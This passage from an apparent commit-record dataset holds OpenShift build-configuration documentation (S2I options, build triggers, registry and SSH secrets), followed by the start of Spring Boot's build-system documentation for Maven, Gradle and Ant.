\"kind\": \"ImageStreamTag\",\n \"name\": \"incremental-image:latest\" <1>\n },\n \"incremental\": true <2>\n }\n }\n}\n----\n\n<1> Specify an image that supports incremental builds. The S2I images provided\nby OpenShift do not implement artifact reuse, so setting `*incremental*` to\n*true* will have no effect on builds using those builder images.\n<2> This flag controls whether an incremental build is attempted. If the builder\nimage does not support incremental builds, the build will still succeed, but you\nwill get a log message stating the incremental build was not successful because\nof a missing *_save-artifacts_* script.\n====\n\n[NOTE]\n====\nSee the link:..\/creating_images\/s2i.html[S2I Requirements] topic for information\non how to create a builder image supporting incremental builds.\n====\n\n[[override-builder-image-scripts]]\n\n=== Override Builder Image Scripts\n\nYou can override the *_assemble_*, *_run_*, and *_save-artifacts_*\nlink:..\/creating_images\/s2i.html#s2i-scripts[S2I scripts] provided by the\nbuilder image in one of two ways. Either:\n\n1. Provide an *_assemble_*, *_run_*, and\/or *_save-artifacts_* script in the\n*_.sti\/bin_* directory of your application source repository, or\n\n2. Provide a URL of a directory containing the scripts as part of the strategy\ndefinition. For example:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"builder-image:latest\"\n },\n \"scripts\": \"http:\/\/somehost.com\/scripts_directory\" <1>\n }\n }\n}\n----\n\n<1> This path will have *_run_*, *_assemble_*, and *_save-artifacts_* appended\nto it. If any or all scripts are found they will be used in place of the same\nnamed script(s) provided in the image.\n====\n\n[NOTE]\n====\nFiles located at the `*scripts*` URL take precedence over files located in\n*_.sti\/bin_* of the source repository. See the\nlink:..\/creating_images\/s2i.html[S2I Requirements] topic and the\nlink:https:\/\/github.com\/openshift\/source-to-image\/blob\/master\/docs\/builder_image.md#sti-scripts[S2I\ndocumentation] for information on how S2I scripts are used.\n====\n\n[[configuring-the-source-environment]]\n=== Source Environment\n\nThere are two ways to make environment variables available to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#builds[source build]\nprocess and resulting \\image: link:#environment-files[environment files] and\nlink:#buildconfig-environment[*BuildConfig* environment] values.\n\n[[environment-files]]\n\n==== Environment Files\nSource build enables you to set environment values (one per line) inside your\napplication, by specifying them in a *_.sti\/environment_* file in the source\nrepository. The environment variables specified in this file are present during\nthe build process and in the final docker image. The complete list of supported\nenvironment variables is available in the\nlink:..\/using_images\/overview.html[documentation] for each image.\n\nIf you provide a *_.sti\/environment_* file in your source repository, S2I reads\nthis file during the build. This allows customization of the build behavior as\nthe *_assemble_* script may use these variables.\n\nFor example, if you want to disable assets compilation for your Rails\napplication, you can add `*DISABLE_ASSET_COMPILATION=true*` in the\n*_.sti\/environment_* file to cause assets compilation to be skipped during the\nbuild.\n\nIn addition to builds, the specified environment variables are also available in\nthe running application itself. For example, you can add\n`*RAILS_ENV=development*` to the *_.sti\/environment_* file to cause the Rails\napplication to start in `development` mode instead of `production`.\n\n[[buildconfig-environment]]\n\n==== BuildConfig Environment\nYou can add environment variables to the `*sourceStrategy*` definition of the\n`*BuildConfig*`. Defined environment variables are visible during the *_assemble_*\nscript execution and will be defined in the output image, making them also\navailable to the *_run_* script and application code.\n\nFor example disabling assets compilation for your Rails application:\n\n====\n\n----\n{\n \"sourceStrategy\": {\n ...\n \"env\": [\n {\n \"name\": \"DISABLE_ASSET_COMPILATION\",\n \"value\": \"true\"\n }\n ]\n }\n}\n----\n====\n\n[[docker-strategy-options]]\n\n== Docker Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#docker-build[Docker\nbuild strategy].\n\n[[no-cache]]\n\n=== No Cache\n\nDocker builds normally reuse cached layers found on the host performing the\nbuild. Setting the `*nocache*` option to *true* forces the build to ignore\ncached layers and rerun all steps of the *_Dockerfile_*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Docker\",\n \"dockerStrategy\": {\n \"nocache\": true\n }\n }\n}\n----\n====\n\n[[docker-force-pull]]\n\n=== Force Pull\n\nBy default, if the builder image specified in the build configuration is\navailable locally on the node, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Docker\",\n \"dockerStrategy\": {\n \"forcePull\": true <1>\n }\n }\n}\n----\n\n<1> This flag causes the local builder image to be ignored, and a fresh version\nto be pulled from the registry to which the image stream points. Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\n\n\n[[custom-strategy-options]]\n\n== Custom Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#custom-build[Custom\nbuild strategy].\n\n[[expose-docker-socket]]\n\n=== Expose Docker Socket\n\nIn order to allow the running of Docker commands and the\nbuilding of Docker images from inside the Docker container, the build container must be bound to an\naccessible socket. Set the `*exposeDockerSocket*` option to *true* to make this occur.\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Custom\",\n \"customStrategy\": {\n \"exposeDockerSocket\": true\n }\n }\n}\n----\n====\n\nifdef::openshift-origin[]\n[[custom-force-pull]]\n\n=== Force Pull\n\nBy default, when setting up the build pod, the build controller checks if the image specified in the build configuration is\navailable locally on the node. If so, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Custom\",\n \"customStrategy\": {\n \"forcePull\": true <1>\n }\n }\n}\n----\n\n<1> This flag causes the local builder image to be ignored, and a fresh version\nto be pulled from the registry to which the image stream points. Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\nendif::openshift-origin[]\n\n[[using-a-proxy-for-git-cloning]]\n\n== Using a Proxy for Git Cloning\nIf your Git repository can only be accessed using a proxy, you can define the\nproxy to use in the `*source*` section of the `*BuildConfig*`. You can configure\nboth a HTTP and HTTPS proxy to use. Both fields are optional.\n\n[NOTE]\n====\nYour source URI must use the HTTP or HTTPS protocol for this to work.\n====\n\n====\n\n[source,json]\n----\n\"source\": {\n \"type\": \"Git\",\n \"git\": {\n \"uri\": \"https:\/\/github.com\/openshift\/ruby-hello-world.git\", <1>\n \"httpProxy\" : \"http:\/\/someproxy.com\", <2>\n \"httpsProxy\" : \"https:\/\/someproxy.com\" <3>\n }\n}\n----\n\n<1> Must be an HTTP or HTTPS URI.\n<2> Specify the HTTP proxy to use.\n<3> Specify the HTTPS proxy to use.\n====\n\n[[starting-a-build]]\n\n== Starting a Build\nManually invoke a build using the following command:\n\n----\n$ oc start-build <BuildConfigName>\n----\n\nRe-run a build using the `--from-build` flag:\n\n----\n$ oc start-build --from-build=<buildName>\n----\n\nSpecify the `--follow` flag to stream the build's logs in stdout:\n\n----\n$ oc start-build <BuildConfigName> --follow\n----\n\n[[canceling-a-build]]\n\n== Canceling a Build\nManually cancel a build using the following command:\n\n----\n$ oc cancel-build <buildName>\n----\n\n[[accessing-build-logs]]\n\n== Accessing Build Logs\nTo allow access to build logs, use the following command:\n\n----\n$ oc build-logs <buildName>\n----\n\n*Log Verbosity*\n\nTo enable more verbose output, pass the `*BUILD_LOGLEVEL*` environment variable\nas part of the `*sourceStrategy*` or `*dockerStrategy*` in a `*BuildConfig*`:\n\n====\n\n----\n{\n \"sourceStrategy\": {\n ...\n \"env\": [\n {\n \"name\": \"BUILD_LOGLEVEL\",\n \"value\": \"2\" <1>\n }\n ]\n }\n}\n----\n\n<1> Adjust this value to the desired log level.\n====\n\nNOTE: A platform administrator can set verbosity for the entire OpenShift\ninstance by passing the `--loglevel` option to the `openshift start` command.\nIf both `--loglevel` and `BUILD_LOGLEVEL` are specified, `BUILD_LOGLEVEL` takes precedence.\n\nAvailable log levels for Source builds are as follows:\n\n[horizontal]\nLevel 0:: Produces output from containers running the *_assemble_* script and all encountered errors. This is the default.\nLevel 1:: Produces basic information about the executed process.\nLevel 2:: Produces very detailed information about the executed process.\nLevel 3:: Produces very detailed information about the executed process, and a listing of the archive contents.\nLevel 5:: Produces everything mentioned on previous levels and additionally provides docker push messages.\n\n[[source-code]]\n\n== Source Code\nThe source code location is one of the required parameters for the\n`*BuildConfig*`. The build uses this location and fetches the source code that\nis later built. The source code location definition is part of the\n`*parameters*` section in the `*BuildConfig*`:\n\n====\n\n----\n{\n \"source\" : {\n \"type\" : \"Git\", <1>\n \"git\" : { <2>\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\"\n },\n \"contextDir\": \"app\/dir\", <3>\n },\n}\n----\n\n<1> The `*type*` field describes which SCM is used to fetch your source code.\n<2> The `*git*` field contains the URI to the remote Git repository of the\nsource code. Optionally, specify the `*ref*` field to check out a specific Git\nreference. A valid `*ref*` can be a SHA1 tag or a branch name.\n<3> The `*contextDir*` field allows you to override the default location inside\nthe source code repository where the build looks for the application source\ncode. If your application exists inside a sub-directory, you can override the\ndefault location (the root folder) using this field.\n====\n\n[[build-triggers]]\n\n== Build Triggers\nWhen defining a `*BuildConfig*`, you can define triggers to control the\ncircumstances in which the `*BuildConfig*` should be run. The following build\ntriggers are available:\n\n* link:#webhook-triggers[Webhook]\n* link:#image-change-triggers[Image change]\n* link:#config-change-triggers[Configuration change]\n\n[[webhook-triggers]]\n\n=== Webhook Triggers\nWebhook triggers allow you to trigger a new build by sending a request to the\nOpenShift API endpoint. You can define these triggers using\nhttps:\/\/developer.github.com\/webhooks\/[GitHub webhooks] or Generic webhooks.\n\n*GitHub Webhooks*\n\nhttps:\/\/developer.github.com\/webhooks\/creating\/[GitHub webhooks] handle the call\nmade by GitHub when a repository is updated. When defining the trigger, you must\nspecify a link:..\/dev_guide\/secrets.html[`*secret*`] as part of the URL you supply\nto GitHub when configuring the webhook. The `*secret*` ensures that only you and\nyour repository can trigger the build. The following example is a trigger\ndefinition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"GitHub\",\n \"github\": {\n \"secret\": \"secret101\"\n }\n}\n----\n====\n\nThe payload URL is returned as the GitHub Webhook URL by the `describe` command\n(see link:#describe-buildconfig[below]), and is structured as follows:\n\n----\nhttp:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/github\n----\n\n*Generic Webhooks*\n\nGeneric webhooks can be invoked from any system capable of making a web\nrequest. As with a GitHub webhook, you must specify a `*secret*` when defining the\ntrigger, and the caller must provide this `*secret*` to trigger the build. The\nfollowing is an example trigger definition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"Generic\",\n \"generic\": {\n \"secret\": \"secret101\"\n }\n}\n----\n====\n\nTo set up the caller, supply the calling system with the URL of the generic\nwebhook endpoint for your build:\n\n----\nhttp:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/generic\n----\n\nThe endpoint can accept an optional payload with the following format:\n\n====\n\n----\n{\n type: 'git',\n git: {\n uri: '<url to git repository>',\n ref: '<optional git reference>',\n commit: '<commit hash identifying a specific git commit>',\n author: {\n name: '<author name>',\n email: '<author e-mail>',\n },\n committer: {\n name: '<committer name>',\n email: '<committer e-mail>',\n },\n message: '<commit message>'\n }\n}\n----\n====\n\n[[describe-buildconfig]]\n\n*Displaying a BuildConfig's Webhook URLs*\n\nUse the following command to display the webhook URLs associated with a build\nconfiguration:\n\n----\n$ oc describe bc <name>\n----\n\nIf the above command does not display any webhook URLs, then no webhook trigger\nis defined for that build configuration.\n\n[[image-change-triggers]]\n\n=== Image Change Triggers\nImage change triggers allow your build to be automatically invoked when a new\nversion of an upstream image is available. For example, if a build is based on\ntop of a RHEL image, then you can trigger that build to run any time the RHEL\nimage changes. As a result, the application image is always running on the\nlatest RHEL base image.\n\nConfiguring an image change trigger requires the following actions:\n\n. Define an `*ImageStream*` that points to the upstream image you want to\ntrigger on:\n+\n====\n\n----\n{\n \"kind\": \"ImageStream\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"ruby-20-centos7\"\n }\n}\n----\n====\n+\nThis defines the image stream that is tied to a Docker image repository\nlocated at `_<system-registry>_\/_<namespace>_\/ruby-20-centos7`. The\n`_<system-registry>_` is defined as a service with the name `docker-registry`\nrunning in OpenShift.\n\n. If an image stream is the base image for the build, set the from field in the\nbuild strategy to point to the image stream:\n+\n====\n\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"ruby-20-centos7:latest\"\n },\n }\n }\n}\n----\n====\n+\nIn this case, the `*sourceStrategy*` definition is consuming the `latest` tag of\nthe image stream named `ruby-20-centos7` located within this namespace.\n\n. Define a build with one or more triggers that point to image streams:\n+\n====\n\n----\n{\n \"type\": \"imageChange\", <1>\n \"imageChange\": {}\n}\n{\n \"type\": \"imagechange\", <2>\n \"imageChange\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"custom-image:latest\"\n }\n }\n}\n----\n\n<1> An image change trigger that monitors the `*ImageStream*` and\n`*Tag*` as defined by the build strategy's `*from*` field. The `*imageChange*` part\nmust be empty.\n<2> An image change trigger that monitors an arbitrary image stream. The `*imageChange*`\npart in this case must include a `*from*` field that references the `*ImageStreamTag*` to monitor.\n====\n\nWhen using an image change trigger for the strategy image stream, the generated build\nis supplied with an immutable Docker tag that points to the latest image corresponding\nto that tag. This new image reference will be used by the strategy\nwhen it executes for the build. For other image change triggers that do not\nreference the strategy image stream, a new build will be started, but the build\nstrategy will not be updated with a unique image reference.\n\nIn the example above that has an image change trigger for the strategy, the resulting build will be:\n\n====\n\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"DockerImage\",\n \"name\": \"172.30.17.3:5001\/mynamespace\/ruby-20-centos7:immutableid\"\n }\n }\n }\n}\n----\n====\n\nThis ensures that the triggered build uses the new image that was just pushed to\nthe repository, and the build can be re-run any time with the same inputs.\n\nIn addition to setting the image field for all `*Strategy*` types, for custom\nbuilds, the `OPENSHIFT_CUSTOM_BUILD_BASE_IMAGE` environment variable is checked.\nIf it does not exist, then it is created with the immutable image reference. If\nit does exist then it is updated with the immutable image reference.\n\nIf a build is triggered due to a webhook trigger or manual request,\nthe build that is created uses the `*immutableid*` resolved from the\n`*ImageStream*` referenced by the `*Strategy*`. This ensures that builds\nare performed using consistent image tags for ease of reproduction.\n\n[NOTE]\n====\nImage streams that point to Docker images in v1 Docker registries will only trigger a build\nonce when the image stream tag becomes available and not on subsequent image updates. This is due\nto the lack of uniquely identifiable images in v1 Docker registries.\n====\n\n[[config-change-triggers]]\n=== Configuration Change Triggers\nA configuration change trigger allows a build to be automatically invoked as\nsoon as a new `*BuildConfig*` is created. The following is an example trigger\ndefinition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"ConfigChange\"\n}\n----\n\n====\n\n[NOTE]\n====\nConfiguration change triggers currently only work when creating a new\n`*BuildConfig*`. In a future release, configuration change triggers will also be\nable to launch a build whenever a `*BuildConfig*` is updated.\n====\n\n[#using-docker-credentials-for-pushing-and-pulling-images]\n== Using Docker Credentials for Pushing and Pulling Images\n\nSupply the *_.dockercfg_* file with valid Docker Registry credentials in order to\npush the output image into a private Docker Registry or pull the builder image\nfrom the private Docker Registry that requires authentication. For the OpenShift\nDocker Registry, you don't have to do this because `*secrets*` are generated\nautomatically for you by OpenShift.\n\nThe *_.dockercfg_* JSON file is found in your home directory by default and has\nthe following format:\n\n====\n\n----\n{\n\t\"https:\/\/index.docker.io\/v1\/\": { <1>\n\t\t\"auth\": \"YWRfbGzhcGU6R2labnRib21ifTE=\", <2>\n\t\t\"email\": \"user@example.com\" <3>\n\t}\n}\n----\n\n<1> URL of the registry.\n<2> Encrypted password.\n<3> Email address for the login.\n====\n\nYou can define multiple Docker registry entries in this file. Alternatively, you\ncan also add authentication entries to this file by running the `docker login`\ncommand. The file will be created if it does not exist. Kubernetes provides\nhttps:\/\/github.com\/GoogleCloudPlatform\/kubernetes\/blob\/master\/docs\/design\/secrets.md[`*secret*`],\nwhich are used to store your configuration and passwords.\n\n. Create the `*secret*` from your local *_.dockercfg_* file:\n+\n====\n----\n$ oc secrets new dockerhub ~\/.dockercfg\n----\n====\n+\nThis generates a JSON specification of the `*secret*` named *dockerhub* and\ncreates the object.\n\n. Once the `*secret*` is created, add it to the builder service account:\n+\n====\n----\n$ oc secrets add serviceaccount\/builder secrets\/dockerhub\n----\n====\n\n. Add a `*pushSecret*` field into the `*output*` section of the `*BuildConfig*` and\nset it to the name of the `*secret*` that you created, which in the above example\nis *dockerhub*:\n+\n====\n\n----\n{\n \"parameters\": {\n \"output\": {\n \"to\": {\n \"name\": \"private-image\"\n },\n \"pushSecret\":{\n \"name\": \"dockerhub\"\n }\n }\n }\n}\n----\n====\n\n. Pull the builder Docker image from a private Docker registry by specifying the\n`*pullSecret*` field, which is part of the build strategy definition:\n+\n====\n\n----\n{\n \"strategy\": {\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"DockerImage\",\n \"name\": \"docker.io\/user\/private_repository\"\n },\n \"pullSecret\": {\n \"name\": \"dockerhub\"\n },\n },\n \"type\": \"Source\"\n }\n}\n----\n====\n\n[#using-private-repositories-for-builds]\n== Using Private Repositories for Builds\n\nSupply valid credentials to build an application from a private repository.\nCurrently, only SSH key based authentication is supported. The repository keys\nare located in the `$HOME\/.ssh\/` directory, and are named `id_dsa.pub`,\n`id_ecdsa.pub`, `id_ed25519.pub`, or `id_rsa.pub` by default. Generate SSH key\ncredentials with the following command:\n\n====\n\n----\n$ ssh-keygen -t rsa -C \"your_email@example.com\"\n----\n====\n\nTwo files are created: the public key and a corresponding private key (one of\n`id_dsa`, `id_ecdsa`, `id_ed25519`, or `id_rsa`). With both of these in place,\nconsult your source control management (SCM) system's manual on how to upload\nthe public key. The private key will be used to access your private repository.\n\nA link:dev_guide\/secrets[`*secret*`]\nis used to store your keys.\n\n. Create the `*secret*` first before using the SSH key to access the private\nrepository:\n+\n====\n----\n$ oc secrets new scmsecret ssh-privatekey=$HOME\/.ssh\/id_rsa\n----\n====\n\n\n. Add the `*secret*` to the builder service account:\n+\n====\n\n----\n$ oc secrets add serviceaccount\/builder secrets\/scmsecret\n----\n====\n\n\n. Add a `*sourceSecret*` field into the `*source*` section inside the\n`*BuildConfig*` and set it to the name of the `*secret*` that you created, in\nthis case `*scmsecret*`:\n+\n====\n\n----\n{\n \"apiVersion\": \"v1\",\n \"kind\": \"BuildConfig\",\n \"metadata\": {\n \"name\": \"sample-build\",\n },\n \"parameters\": {\n \"output\": {\n \"to\": {\n \"name\": \"sample-image\"\n }\n },\n \"source\": {\n \"git\": {\n \"uri\": \"git@repository.com:user\/app.git\" <1>\n },\n \"sourceSecret\": {\n \"name\": \"scmsecret\"\n },\n \"type\": \"Git\"\n },\n \"strategy\": {\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"python-33-centos7:latest\"\n }\n },\n \"type\": \"Source\"\n }\n }\n----\n<1> The URL of private repository is usually in the form\n`git@example.com:<username>\/<repository>`.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f95486822d07927daed81e7eeb3258c139419cf","subject":"Polish note about Maven\/Gradle restarts","message":"Polish note about Maven\/Gradle restarts\n\nSee gh-24271\n","repos":"wilkinsona\/spring-boot,spring-projects\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,mdeinum\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,jxblum\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,scottfrederick\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,mdeinum\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,Buzzardo\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,Buzzardo\/spring-boot,michael-simons\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,philwebb\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_contents":"[[using-boot]]\n= Using Spring Boot\ninclude::attributes.adoc[]\n\nThis section goes into more detail about how you should use Spring Boot.\nIt covers topics such as build systems, auto-configuration, and how to run your applications.\nWe also cover some Spring Boot best practices.\nAlthough there is nothing particularly special about Spring Boot (it is just another library that you can consume), there are a few recommendations that, when followed, make your development process a little easier.\n\nIf you are starting out with Spring Boot, you should probably read the _<<getting-started.adoc#getting-started, Getting Started>>_ guide before diving into this section.\n\n\n\n[[using-boot-build-systems]]\n== Build Systems\nIt is strongly recommended that you choose a build system that supports <<using-boot-dependency-management,_dependency management_>> and that can consume artifacts published to the \"`Maven Central`\" repository.\nWe would recommend that you choose Maven or Gradle.\nIt is possible to get Spring Boot to work with other build systems (Ant, for example), but they are not particularly well supported.\n\n\n\n[[using-boot-dependency-management]]\n=== Dependency Management\nEach release of Spring Boot provides a curated list of dependencies that it supports.\nIn practice, you do not need to provide a version for any of these dependencies in your build configuration, as Spring Boot manages that for you.\nWhen you upgrade Spring Boot itself, these dependencies are upgraded as well in a consistent way.\n\nNOTE: You can still specify a version and override Spring Boot's recommendations if you need to do so.\n\nThe curated list contains all the spring modules that you can use with Spring Boot as well as a refined list of third party libraries.\nThe list is available as a standard <<using-boot-maven-without-a-parent,Bills of Materials (`spring-boot-dependencies`)>> that can be used with both <<using-boot-maven-parent-pom,Maven>> and <<using-boot-gradle,Gradle>>.\n\nWARNING: Each release of Spring Boot is associated with a base version of the Spring Framework.\nWe **highly** recommend that you not specify its version.\n\n\n\n[[using-boot-maven]]\n=== Maven\nMaven users can inherit from the `spring-boot-starter-parent` project to obtain sensible defaults.\nThe parent project provides the following features:\n\n* Java 1.8 as the default compiler level.\n* UTF-8 source encoding.\n* A <<using-boot-dependency-management,Dependency Management section>>, inherited from the spring-boot-dependencies pom, that manages the versions of common dependencies.\nThis dependency management lets you omit <version> tags for those dependencies when used in your own pom.\n* An execution of the {spring-boot-maven-plugin-docs}\/repackage-mojo.html[`repackage` goal] with a `repackage` execution id.\n* Sensible https:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/examples\/filter.html[resource filtering].\n* Sensible plugin configuration (https:\/\/www.mojohaus.org\/exec-maven-plugin\/[exec plugin], https:\/\/github.com\/ktoso\/maven-git-commit-id-plugin[Git commit ID], and https:\/\/maven.apache.org\/plugins\/maven-shade-plugin\/[shade]).\n* Sensible resource filtering for `application.properties` and `application.yml` including profile-specific files (for example, `application-dev.properties` and `application-dev.yml`)\n\nNote that, since the `application.properties` and `application.yml` files accept Spring style placeholders (`${...}`), the Maven filtering is changed to use `@..@` placeholders.\n(You can override that by setting a Maven property called `resource.delimiter`.)\n\n\n\n[[using-boot-maven-parent-pom]]\n==== Inheriting the Starter Parent\nTo configure your project to inherit from the `spring-boot-starter-parent`, set the `parent` as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<!-- Inherit defaults from Spring Boot -->\n\t<parent>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-parent<\/artifactId>\n\t\t<version>{spring-boot-version}<\/version>\n\t<\/parent>\n----\n\nNOTE: You should need to specify only the Spring Boot version number on this dependency.\nIf you import additional starters, you can safely omit the version number.\n\nWith that setup, you can also override individual dependencies by overriding a property in your own project.\nFor instance, to upgrade to another Spring Data release train, you would add the following to your `pom.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<spring-data-releasetrain.version>Fowler-SR2<\/spring-data-releasetrain.version>\n\t<\/properties>\n----\n\nTIP: Check the {spring-boot-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies` pom] for a list of supported properties.\n\n\n\n[[using-boot-maven-without-a-parent]]\n==== Using Spring Boot without the Parent POM\nNot everyone likes inheriting from the `spring-boot-starter-parent` POM.\nYou may have your own corporate standard parent that you need to use or you may prefer to explicitly declare all your Maven configuration.\n\nIf you do not want to use the `spring-boot-starter-parent`, you can still keep the benefit of the dependency management (but not the plugin management) by using a `scope=import` dependency, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencyManagement>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<!-- Import dependency management from Spring Boot -->\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-dependencies<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/dependencyManagement>\n----\n\nThe preceding sample setup does not let you override individual dependencies by using a property, as explained above.\nTo achieve the same result, you need to add an entry in the `dependencyManagement` of your project **before** the `spring-boot-dependencies` entry.\nFor instance, to upgrade to another Spring Data release train, you could add the following element to your `pom.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencyManagement>\n\t\t<dependencies>\n\t\t\t<!-- Override Spring Data release train provided by Spring Boot -->\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework.data<\/groupId>\n\t\t\t\t<artifactId>spring-data-releasetrain<\/artifactId>\n\t\t\t\t<version>Moore-SR10<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-dependencies<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/dependencyManagement>\n----\n\nNOTE: In the preceding example, we specify a _BOM_, but any dependency type can be overridden in the same way.\n\n\n\n[[using-boot-maven-plugin]]\n==== Using the Spring Boot Maven Plugin\nSpring Boot includes a <<build-tool-plugins.adoc#build-tool-plugins-maven-plugin, Maven plugin>> that can package the project as an executable jar.\nAdd the plugin to your `<plugins>` section if you want to use it, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nNOTE: If you use the Spring Boot starter parent pom, you need to add only the plugin.\nThere is no need to configure it unless you want to change the settings defined in the parent.\n\n\n\n[[using-boot-gradle]]\n=== Gradle\nTo learn about using Spring Boot with Gradle, please refer to the documentation for Spring Boot's Gradle plugin:\n\n* Reference ({spring-boot-gradle-plugin-docs}[HTML] and {spring-boot-gradle-plugin-pdfdocs}[PDF])\n* {spring-boot-gradle-plugin-api}[API]\n\n\n\n[[using-boot-ant]]\n=== Ant\nIt is possible to build a Spring Boot project using Apache Ant+Ivy.\nThe `spring-boot-antlib` \"`AntLib`\" module is also available to help Ant create executable jars.\n\nTo declare dependencies, a typical `ivy.xml` file looks something like the following example:\n\n[source,xml,indent=0]\n----\n\t<ivy-module version=\"2.0\">\n\t\t<info organisation=\"org.springframework.boot\" module=\"spring-boot-sample-ant\" \/>\n\t\t<configurations>\n\t\t\t<conf name=\"compile\" description=\"everything needed to compile this module\" \/>\n\t\t\t<conf name=\"runtime\" extends=\"compile\" description=\"everything needed to run this module\" \/>\n\t\t<\/configurations>\n\t\t<dependencies>\n\t\t\t<dependency org=\"org.springframework.boot\" 